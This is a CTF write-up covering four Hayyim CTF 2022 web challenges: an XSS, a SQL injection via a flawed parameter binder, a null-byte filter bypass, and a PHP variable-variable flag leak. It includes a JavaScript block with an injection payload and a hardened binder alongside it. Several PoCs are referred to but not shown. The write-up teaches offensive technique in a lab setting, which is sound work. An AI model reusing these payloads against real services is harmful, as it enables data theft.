Hayyim CTF 2022 Write Up
2022-02-13 23:29:53

### Summary

This weekend, Hayyim Security hosted a CTF. I participated for about 3 ~ 4 hours and solved the Cyberchef, Not E and Cyber Headchef challenges.

### (Web) Cyberchef [100 pts]

Cyberchef is a simple XSS challenge. CyberChef is an open-source service for encoding, encryption and decryption, and the deployed version has a 1-day vulnerability.

The 1-day issue can be found here. I got the flag by sending the PoC above to the admin bot.

### (Web) Not E [158 pts]

Not E is a SQL injection challenge. The service uses its own parameter-binding function instead of the prepared-statement binding provided by Node's sqlite module, and that function is where the vulnerability lies.

I could see that the flag was stored in a table called flag. So, to solve this challenge, we have to leak the flag from that table via SQL injection. The alternative, reading the /flag file via RCE, is not possible here, so we focus on SQL injection.

First, the functions the note service provides are login, writing a post and reading a post. The routes are:

• /logout
• /new
• /view/:noteId

All input values are type-checked by the checkParam function.

In addition, all SQL queries go through a custom binding function. I suspected a weakness here, because the server uses its own binding function even though Node's sqlite module already provides one.

In the formatQuery() function, each input value is first converted to a string with JSON.stringify(), and the generated value then replaces a '?' placeholder in the query.

When JSON.stringify() is applied to a string, double quotation marks (") are added to both ends of it, as shown above.

If you use the writing function and pass a question mark as the value of title, the query is built as shown above. Looking at the substitution of the second argument, you can see that the question mark that JSON.stringify() placed inside the quoted title ("?") is still treated as a placeholder, so the content value is substituted into that question mark instead of into the original second one. The content therefore lands inside the title's double quotes, and this lets you escape the double quote.

Finally, I wrote the exploit code as shown above.
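The placeholder-reuse bug described above, as an added example that is not the challenge's code or the author's exploit. The real formatQuery() is not reproduced on this page, so formatQueryVuln() below is an assumption of its behaviour: each parameter is JSON.stringify()'d and substituted for the first remaining '?' in turn. The query text, the note/flag table and column names, and the payloads are all constructed for illustration, and the example also shows a hardened binder that cannot be tricked by a '?' inside a value.

```javascript
// Added example for the Not E section. The challenge's real formatQuery() is
// not on this page; formatQueryVuln() is an assumed reconstruction of the
// behaviour the write-up describes. Query text, table/column names and
// payloads are constructed for illustration.

const NOTE_INSERT = 'INSERT INTO note (title, content) VALUES (?, ?)';

// Vulnerable binder (assumed reconstruction). String.prototype.replace with a
// string pattern replaces only the first "?" it finds, and that "?" may be one
// that an earlier substitution just placed inside a quoted value.
function formatQueryVuln(query, params) {
  let out = query;
  for (const p of params) {
    // A replacer function is used so "$&"-style patterns in values are not
    // interpreted; the substitution order is the point of the example.
    out = out.replace('?', () => JSON.stringify(p));
  }
  return out;
}

// Exploit payloads (constructed): a "?" as the title, so the content
// parameter is substituted *inside* the title's double quotes.
const TITLE_PAYLOAD = '?';
// Single quotes only: JSON.stringify() would turn a double quote into \" and
// backslash is not an escape character in SQLite, so the payload avoids them.
const CONTENT_PAYLOAD = "|| (SELECT flag FROM flag), 'x') -- ";

function buildExploitQuery() {
  return formatQueryVuln(NOTE_INSERT, [TITLE_PAYLOAD, CONTENT_PAYLOAD]);
}
// Result:
// INSERT INTO note (title, content) VALUES (""|| (SELECT flag FROM flag), 'x') -- "", ?)
// With SQLite's default double-quoted-string fallback the leading "" is an
// empty literal, "|| (SELECT flag FROM flag)" is raw SQL concatenated into the
// title column, 'x' fills content, and "--" comments out the leftover quotes
// and the original second placeholder. The exact shape depends on the real
// query, which is not on this page.

// Hardened binder: split the query on its placeholders once, so a "?" inside a
// value can never be treated as a placeholder, and emit single-quoted SQL
// string literals with embedded quotes doubled. The real fix is still the
// sqlite driver's own prepared-statement binding; this only shows why the
// JSON.stringify() approach is unsafe.
function sqlStringLiteral(value) {
  return "'" + String(value).replace(/'/g, "''") + "'";
}

function formatQuerySafe(query, params) {
  const parts = query.split('?');
  if (parts.length - 1 !== params.length) {
    throw new Error('placeholder/parameter count mismatch');
  }
  let out = parts[0];
  for (let i = 0; i < params.length; i++) {
    out += sqlStringLiteral(params[i]) + parts[i + 1];
  }
  return out;
}

console.log(formatQueryVuln(NOTE_INSERT, ['hello', 'world']));
console.log(buildExploitQuery());
console.log(formatQuerySafe(NOTE_INSERT, [TITLE_PAYLOAD, CONTENT_PAYLOAD]));
```

Running this prints the benign query, the injected query with raw SQL outside any quotes, and the same payloads rendered harmlessly by the split-once binder. Note that formatQuerySafe() still assumes the query template itself contains no '?' inside a literal; a driver-level prepared statement has no such caveat.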

### (Web) Cyber Headchef [390 pts]

Cyber Headchef is v2 of the Cyberchef challenge and is a 0-day challenge. (This was an unintended solution.)

It filters the substring "chart" from the function names used in the 1-day exploit, but this can be bypassed with null-byte injection.

So I was able to get the flag by sending the PoC above to the admin bot.

### (Web/Not Solved) Gnuboard [498 pts]

The Gnuboard challenge requires a 0-day. It was so difficult that I couldn't solve it while the competition was in progress, and after the competition I asked as3617.

I could see in the Dockerfile that the latest version of Gnuboard 5 was in use, and that the flag was defined as a variable called $flag in common.php. After a long time analyzing Gnuboard I found a SQL injection vector, but it did not seem to work reliably, and even if the injection worked I did not think I could do anything useful with it, so I had to give up.

Hayyim Security released a hint because nobody had solved the challenge. The hint pointed at the payment code. The code above is the Kakao Pay payment logic. The important part is the try/catch statement: the vulnerability is in the catch block, which runs when a payment fails. It sends a request to $netCancle with the $httpUtil->processHTTP() function and stores the return value in the $netcancelResultString variable. After that, I could see that variable variables are used twice in total, inside str_replace() calls.

If the value of $netcancelResultString after the HTTP request contains the string authToken, as above, then on the first str_replace() call the variable variable resolves to $authToken, and the string flag is saved as the value of $netcancelResultString. ($authToken holds the string flag.) On the second str_replace() call, $$netcancelResultString is now the same as $flag, so the flag defined in common.php is saved in the $netcancelResultString variable.

To trigger the error, pass an incorrect URL as the value of authUrl.

Finally, I got the flag by sending a request like the one above.

Thanks to Hayyim Security for making these fun challenges. It's been a long time since I learned so much.
